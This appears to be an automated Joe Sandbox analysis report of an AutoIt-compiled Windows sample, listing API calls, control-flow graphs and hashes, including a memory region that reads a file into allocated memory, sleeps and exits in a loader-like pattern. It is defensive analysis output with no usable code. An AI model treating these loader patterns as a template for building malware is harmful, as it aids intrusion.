                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                        • API String ID: 2914291525-1005189915
                                                        • Opcode ID: e0133bccceedd3155b7c70160df8b10c80e0ce8be8aadb36eb5519f5772fc09f
                                                        • Instruction ID: 26c3e3eaaeb9e75b61ca4d2297780aa7ca23b780d36dd80545820791a6bef79d
                                                        • Opcode Fuzzy Hash: e0133bccceedd3155b7c70160df8b10c80e0ce8be8aadb36eb5519f5772fc09f
                                                        • Instruction Fuzzy Hash: BD21B2B5D04218AFDB109FA5EC89BCDBBB5FB08700F00422AF615B62A0D7B645499F91

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00E8BDB4: __time64.LIBCMT ref: 00E8BDBE
                                                          • Part of subcall function 00E44517: _fseek.LIBCMT ref: 00E4452F
                                                        • __wsplitpath.LIBCMT ref: 00E8C083
                                                          • Part of subcall function 00E61DFC: __wsplitpath_helper.LIBCMT ref: 00E61E3C
                                                        • _wcscpy.LIBCMT ref: 00E8C096
                                                        • _wcscat.LIBCMT ref: 00E8C0A9
                                                        • __wsplitpath.LIBCMT ref: 00E8C0CE
                                                        • _wcscat.LIBCMT ref: 00E8C0E4
                                                        • _wcscat.LIBCMT ref: 00E8C0F7
                                                        • _wcscmp.LIBCMT ref: 00E8C03E
                                                          • Part of subcall function 00E8C56D: _wcscmp.LIBCMT ref: 00E8C65D
                                                          • Part of subcall function 00E8C56D: _wcscmp.LIBCMT ref: 00E8C670
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E8C2A1
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E8C338
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E8C34E
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E8C35F
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E8C371
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                        • String ID:
                                                        • API String ID: 2378138488-0
                                                        • Opcode ID: a187d162f8ae992bc18a5195320772b529f0a25600cc79d29684ad2c21421585
                                                        • Instruction ID: aec16d616ab45160dcb637ef111677603358427a32c86816e714211655667602
                                                        • Opcode Fuzzy Hash: a187d162f8ae992bc18a5195320772b529f0a25600cc79d29684ad2c21421585
                                                        • Instruction Fuzzy Hash: 52C128B1A00219AFDF21EFA5DC81EDEB7B8AF49304F1050AAF60DF6151DB319A448F61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 957 e43742-e43762 959 e43764-e43767 957->959 960 e437c2-e437c4 957->960 962 e437c8 959->962 963 e43769-e43770 959->963 960->959 961 e437c6 960->961 964 e437ab-e437b3 DefWindowProcW 961->964 965 e437ce-e437d1 962->965 966 eb1e00-eb1e2e call e42ff6 call e5e312 962->966 967 e43776-e4377b 963->967 968 e4382c-e43834 PostQuitMessage 963->968 969 e437b9-e437bf 964->969 970 e437f6-e4381d SetTimer RegisterWindowMessageW 965->970 971 e437d3-e437d4 965->971 1000 eb1e33-eb1e3a 966->1000 973 eb1e88-eb1e9c call e84ddd 967->973 974 e43781-e43783 967->974 975 e437f2-e437f4 968->975 970->975 979 e4381f-e4382a CreatePopupMenu 970->979 976 eb1da3-eb1da6 971->976 977 e437da-e437ed KillTimer call e43847 call e4390f 971->977 973->975 991 eb1ea2 973->991 980 e43836-e43840 call e5eb83 974->980 981 e43789-e4378e 974->981 975->969 984 eb1da8-eb1daa 976->984 985 eb1ddc-eb1dfb MoveWindow 976->985 977->975 979->975 992 e43845 980->992 988 e43794-e43799 981->988 989 eb1e6d-eb1e74 981->989 993 eb1dcb-eb1dd7 SetFocus 984->993 994 eb1dac-eb1daf 984->994 985->975 998 eb1e58-eb1e68 call e855bd 988->998 999 e4379f-e437a5 988->999 989->964 996 eb1e7a-eb1e83 call e7a5f3 989->996 991->964 992->975 993->975 994->999 1001 eb1db5-eb1dc6 call e42ff6 994->1001 996->964 998->975 999->964 999->1000 1000->964 1005 eb1e40-eb1e53 call e43847 call e44ffc 1000->1005 1001->975 1005->964
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00E437B3
                                                        • KillTimer.USER32(?,00000001), ref: 00E437DD
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E43800
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E4380B
                                                        • CreatePopupMenu.USER32 ref: 00E4381F
                                                        • PostQuitMessage.USER32(00000000), ref: 00E4382E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: a1b00891e909ca5936a800b103afac20f6f84912aca48305c8286bc62a52219c
                                                        • Instruction ID: f1937120726d31d636d6f7825c0b8dd63731710752d0568381d2a962b7b3f8ef
                                                        • Opcode Fuzzy Hash: a1b00891e909ca5936a800b103afac20f6f84912aca48305c8286bc62a52219c
                                                        • Instruction Fuzzy Hash: DD4107F5204249ABDB146F78FC4EFBB3695FB44305F44212AFA82F21D1DB619E40A762

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E43E79
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E43E88
                                                        • LoadIconW.USER32(00000063), ref: 00E43E9E
                                                        • LoadIconW.USER32(000000A4), ref: 00E43EB0
                                                        • LoadIconW.USER32(000000A2), ref: 00E43EC2
                                                          • Part of subcall function 00E44024: LoadImageW.USER32(00E40000,00000063,00000001,00000010,00000010,00000000), ref: 00E44048
                                                        • RegisterClassExW.USER32(?), ref: 00E43F30
                                                          • Part of subcall function 00E43F53: GetSysColorBrush.USER32(0000000F), ref: 00E43F86
                                                          • Part of subcall function 00E43F53: RegisterClassExW.USER32(00000030), ref: 00E43FB0
                                                          • Part of subcall function 00E43F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E43FC1
                                                          • Part of subcall function 00E43F53: InitCommonControlsEx.COMCTL32(?), ref: 00E43FDE
                                                          • Part of subcall function 00E43F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E43FEE
                                                          • Part of subcall function 00E43F53: LoadIconW.USER32(000000A9), ref: 00E44004
                                                          • Part of subcall function 00E43F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E44013
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 25727dcbbb311455c49b0fef57699c835e036db91f5c8afc9a08cdd73a1009e6
                                                        • Instruction ID: 265a3a6400967a6e7b81c28ce8cb3891e771e48af5ccbd886ba56b357c911232
                                                        • Opcode Fuzzy Hash: 25727dcbbb311455c49b0fef57699c835e036db91f5c8afc9a08cdd73a1009e6
                                                        • Instruction Fuzzy Hash: 312141B0D04308AFDB14DFA9EC4AA99BFF9FB48310F10812AE219B72A0D7754645DF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1021 e6acb3-e6ace0 call e66ac0 call e67cf4 call e66986 1028 e6ace2-e6acf8 call e6e880 1021->1028 1029 e6acfd-e6ad02 1021->1029 1035 e6af52-e6af57 call e66b05 1028->1035 1031 e6ad08-e6ad0f 1029->1031 1033 e6ad42-e6ad51 GetStartupInfoW 1031->1033 1034 e6ad11-e6ad40 1031->1034 1036 e6ad57-e6ad5c 1033->1036 1037 e6ae80-e6ae86 1033->1037 1034->1031 1036->1037 1039 e6ad62-e6ad79 1036->1039 1040 e6af44-e6af50 call e6af58 1037->1040 1041 e6ae8c-e6ae9d 1037->1041 1044 e6ad80-e6ad83 1039->1044 1045 e6ad7b-e6ad7d 1039->1045 1040->1035 1046 e6aeb2-e6aeb8 1041->1046 1047 e6ae9f-e6aea2 1041->1047 1052 e6ad86-e6ad8c 1044->1052 1045->1044 1050 e6aebf-e6aec6 1046->1050 1051 e6aeba-e6aebd 1046->1051 1047->1046 1048 e6aea4-e6aead 1047->1048 1053 e6af3e-e6af3f 1048->1053 1054 e6aec9-e6aed5 GetStdHandle 1050->1054 1051->1054 1055 e6adae-e6adb6 1052->1055 1056 e6ad8e-e6ad9f call e66986 1052->1056 1053->1037 1058 e6aed7-e6aed9 1054->1058 1059 e6af1c-e6af32 1054->1059 1057 e6adb9-e6adbb 1055->1057 1068 e6ada5-e6adab 1056->1068 1069 e6ae33-e6ae3a 1056->1069 1057->1037 1061 e6adc1-e6adc6 1057->1061 1058->1059 1062 e6aedb-e6aee4 GetFileType 1058->1062 1059->1053 1064 e6af34-e6af37 1059->1064 1065 e6ae20-e6ae31 1061->1065 1066 e6adc8-e6adcb 1061->1066 1062->1059 1067 e6aee6-e6aef0 1062->1067 1064->1053 1065->1057 1066->1065 1070 e6adcd-e6add1 1066->1070 1071 e6aef2-e6aef8 1067->1071 1072 e6aefa-e6aefd 1067->1072 1068->1055 1073 e6ae40-e6ae4e 1069->1073 1070->1065 1074 e6add3-e6add5 1070->1074 1075 e6af05 1071->1075 1076 e6aeff-e6af03 1072->1076 1077 e6af08-e6af1a InitializeCriticalSectionAndSpinCount 1072->1077 1078 e6ae74-e6ae7b 1073->1078 1079 e6ae50-e6ae72 1073->1079 1080 e6add7-e6ade3 GetFileType 1074->1080 1081 e6ade5-e6ae1a InitializeCriticalSectionAndSpinCount 1074->1081 1075->1077 1076->1075 1077->1053 1078->1052 1079->1073 1080->1081 1082 e6ae1d 1080->1082 1081->1082 1082->1065
                                                        APIs
                                                        • __lock.LIBCMT ref: 00E6ACC1
                                                          • Part of subcall function 00E67CF4: __mtinitlocknum.LIBCMT ref: 00E67D06
                                                          • Part of subcall function 00E67CF4: EnterCriticalSection.KERNEL32(00000000,?,00E67ADD,0000000D), ref: 00E67D1F
                                                        • __calloc_crt.LIBCMT ref: 00E6ACD2
                                                          • Part of subcall function 00E66986: __calloc_impl.LIBCMT ref: 00E66995
                                                          • Part of subcall function 00E66986: Sleep.KERNEL32(00000000,000003BC,00E5F507,?,0000000E), ref: 00E669AC
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E6ACED
                                                        • GetStartupInfoW.KERNEL32(?,00EF6E28,00000064,00E65E91,00EF6C70,00000014), ref: 00E6AD46
                                                        • __calloc_crt.LIBCMT ref: 00E6AD91
                                                        • GetFileType.KERNEL32(00000001), ref: 00E6ADD8
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E6AE11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1426640281-0
                                                        • Opcode ID: aa08451aaaa1b9f9994c2f8d17f85a6ccbd779d354cdbf43dd0ed0b3be459d81
                                                        • Instruction ID: b9cd8a9cc7f59fe13fe6fb589344021731d997e79cc3ae6ab6959e6951858b2c
                                                        • Opcode Fuzzy Hash: aa08451aaaa1b9f9994c2f8d17f85a6ccbd779d354cdbf43dd0ed0b3be459d81
                                                        • Instruction Fuzzy Hash: 8D81D070D452458FDB14CF68E8845A9BBF0AF05368B28627ED4A6BB3D1C7359843CF52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1083 bc3a00-bc3aae call bc1400 1086 bc3ab5-bc3adb call bc4910 CreateFileW 1083->1086 1089 bc3add 1086->1089 1090 bc3ae2-bc3af2 1086->1090 1091 bc3c2d-bc3c31 1089->1091 1097 bc3af9-bc3b13 VirtualAlloc 1090->1097 1098 bc3af4 1090->1098 1093 bc3c73-bc3c76 1091->1093 1094 bc3c33-bc3c37 1091->1094 1099 bc3c79-bc3c80 1093->1099 1095 bc3c39-bc3c3c 1094->1095 1096 bc3c43-bc3c47 1094->1096 1095->1096 1100 bc3c49-bc3c53 1096->1100 1101 bc3c57-bc3c5b 1096->1101 1102 bc3b1a-bc3b31 ReadFile 1097->1102 1103 bc3b15 1097->1103 1098->1091 1104 bc3cd5-bc3cea 1099->1104 1105 bc3c82-bc3c8d 1099->1105 1100->1101 1108 bc3c5d-bc3c67 1101->1108 1109 bc3c6b 1101->1109 1110 bc3b38-bc3b78 VirtualAlloc 1102->1110 1111 bc3b33 1102->1111 1103->1091 1106 bc3cec-bc3cf7 VirtualFree 1104->1106 1107 bc3cfa-bc3d02 1104->1107 1112 bc3c8f 1105->1112 1113 bc3c91-bc3c9d 1105->1113 1106->1107 1108->1109 1109->1093 1114 bc3b7f-bc3b9a call bc4b60 1110->1114 1115 bc3b7a 1110->1115 1111->1091 1112->1104 1116 bc3c9f-bc3caf 1113->1116 1117 bc3cb1-bc3cbd 1113->1117 1123 bc3ba5-bc3baf 1114->1123 1115->1091 1118 bc3cd3 1116->1118 1119 bc3cbf-bc3cc8 1117->1119 1120 bc3cca-bc3cd0 1117->1120 1118->1099 1119->1118 1120->1118 1124 bc3bb1-bc3be0 call bc4b60 1123->1124 1125 bc3be2-bc3bf6 call bc4970 1123->1125 1124->1123 1131 bc3bf8 1125->1131 1132 bc3bfa-bc3bfe 1125->1132 1131->1091 1133 bc3c0a-bc3c0e 1132->1133 1134 bc3c00-bc3c04 CloseHandle 1132->1134 1135 bc3c1e-bc3c27 1133->1135 1136 bc3c10-bc3c1b VirtualFree 1133->1136 1134->1133 1135->1086 1135->1091 1136->1135
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00BC3AD1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BC3CF7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction ID: fb15a1441977db0c8231fbe26ad24a2f5b9a6c05972f7f4e0ae52ddef4ee3d9c
                                                        • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                        • Instruction Fuzzy Hash: 04A10274E00208EBDB14CFA4C998FAEBBF5FF48705F208599E511BB280C7759A80DB94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1192 e449fb-e44a25 call e4bcce RegOpenKeyExW 1195 eb41cc-eb41e3 RegQueryValueExW 1192->1195 1196 e44a2b-e44a2f 1192->1196 1197 eb4246-eb424f RegCloseKey 1195->1197 1198 eb41e5-eb4222 call e5f4ea call e447b7 RegQueryValueExW 1195->1198 1203 eb423d-eb4245 call e447e2 1198->1203 1204 eb4224-eb423b call e46a63 1198->1204 1203->1197 1204->1203
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E44A1D
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EB41DB
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EB421A
                                                        • RegCloseKey.ADVAPI32(?), ref: 00EB4249
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                        • API String ID: 1586453840-614718249
                                                        • Opcode ID: c5dc9aec26a044d51b2338a97e613944481c8d962563662610abcd5a18893a7c
                                                        • Instruction ID: d5b8c6527c39017b04e671538c88b41e1a52b522463ac53a733362fb1f0ca071
                                                        • Opcode Fuzzy Hash: c5dc9aec26a044d51b2338a97e613944481c8d962563662610abcd5a18893a7c
                                                        • Instruction Fuzzy Hash: B11142B1605208BFDB04ABA8DD86DFFBBBCEF04344F101065B506F61A1EA719E06D750

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1219 e436b8-e43728 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E436E6
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E43707
                                                        • ShowWindow.USER32(00000000,?,?,?,?,00E43AA3,?), ref: 00E4371B
                                                        • ShowWindow.USER32(00000000,?,?,?,?,00E43AA3,?), ref: 00E43724
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 18737d82dbd3fded1f6cba63c8f9e4d9b2072cecfdb9aad306ef7c880a00dbbe
                                                        • Instruction ID: c44714db2667ce172ec37b24963aa687af9889b1cd2bb5465aad517db6087060
                                                        • Opcode Fuzzy Hash: 18737d82dbd3fded1f6cba63c8f9e4d9b2072cecfdb9aad306ef7c880a00dbbe
                                                        • Instruction Fuzzy Hash: 20F05E705442D87AE7305757AC48E773EBEF7C6F20F01802FBA04A22B0C5721896EAB0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1324 bc37b0-bc38fd call bc1400 call bc36a0 CreateFileW 1331 bc38ff 1324->1331 1332 bc3904-bc3914 1324->1332 1333 bc39b4-bc39b9 1331->1333 1335 bc391b-bc3935 VirtualAlloc 1332->1335 1336 bc3916 1332->1336 1337 bc3939-bc3950 ReadFile 1335->1337 1338 bc3937 1335->1338 1336->1333 1339 bc3954-bc398e call bc36e0 call bc26a0 1337->1339 1340 bc3952 1337->1340 1338->1333 1345 bc39aa-bc39b2 ExitProcess 1339->1345 1346 bc3990-bc39a5 call bc3730 1339->1346 1340->1333 1345->1333 1346->1345
                                                        APIs
                                                          • Part of subcall function 00BC36A0: Sleep.KERNELBASE(000001F4), ref: 00BC36B1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BC38F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086577656.0000000000BC1000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BC1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_bc1000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: B6SOPS5HQ4LZ2PNLY3KF
                                                        • API String ID: 2694422964-775064131
                                                        • Opcode ID: 93bf3017e659454fa0187cee4711d98e1b70f9668f03d0c1b458ef3a4d27858a
                                                        • Instruction ID: 98fb5d9febd3c876004390c628813583c17970209ad863e89e243ac16ae7f6ee
                                                        • Opcode Fuzzy Hash: 93bf3017e659454fa0187cee4711d98e1b70f9668f03d0c1b458ef3a4d27858a
                                                        • Instruction Fuzzy Hash: 24518530E04248DBEF11DBB4C855BEEBBB5AF18704F104199E249BB2C1D7B91B45CBA5
                                                        APIs
                                                        • _memset.LIBCMT ref: 00E4522F
                                                        • _wcscpy.LIBCMT ref: 00E45283
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E45293
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EB3CB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 1053898822-1585850449
                                                        • Opcode ID: cca34f0fb88fe4ab094cf5e2e00df4fab12ede01bd4997df53912f410cd763cf
                                                        • Instruction ID: ba6ceeee86fc34bf3cc977806d395f6b11faf5045d708c38a6b52058454a5d35
                                                        • Opcode Fuzzy Hash: cca34f0fb88fe4ab094cf5e2e00df4fab12ede01bd4997df53912f410cd763cf
                                                        • Instruction Fuzzy Hash: 87319E72508744AFD321EB60FC42FDB77E8BF44314F10591AF589A21A2EB70A649CB96
                                                        APIs
                                                          • Part of subcall function 00E441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E439FE,?,00000001), ref: 00E441DB
                                                        • _free.LIBCMT ref: 00EB36B7
                                                        • _free.LIBCMT ref: 00EB36FE
                                                          • Part of subcall function 00E4C833: __wsplitpath.LIBCMT ref: 00E4C93E
                                                          • Part of subcall function 00E4C833: _wcscpy.LIBCMT ref: 00E4C953
                                                          • Part of subcall function 00E4C833: _wcscat.LIBCMT ref: 00E4C968
                                                          • Part of subcall function 00E4C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00E4C978
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 805182592-1757145024
                                                        • Opcode ID: 47891a2e9c042bfed1071be3feb2585f2d9e4b28cd1c503033c717b3de5a765e
                                                        • Instruction ID: f3e50be85a8c3c7712718de7dbe4c2bdb8ac76c6a1339732c2fc3a7db94405c7
                                                        • Opcode Fuzzy Hash: 47891a2e9c042bfed1071be3feb2585f2d9e4b28cd1c503033c717b3de5a765e
                                                        • Instruction Fuzzy Hash: EB915071A10219AFCF14EFA4DC929EEB7F4BF18314F145429F916BB291DB70AA05CB50
                                                        APIs
                                                          • Part of subcall function 00E45374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F01148,?,00E461FF,?,00000000,00000001,00000000), ref: 00E45392
                                                          • Part of subcall function 00E449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00E44A1D
                                                        • _wcscat.LIBCMT ref: 00EB2D80
                                                        • _wcscat.LIBCMT ref: 00EB2DB5
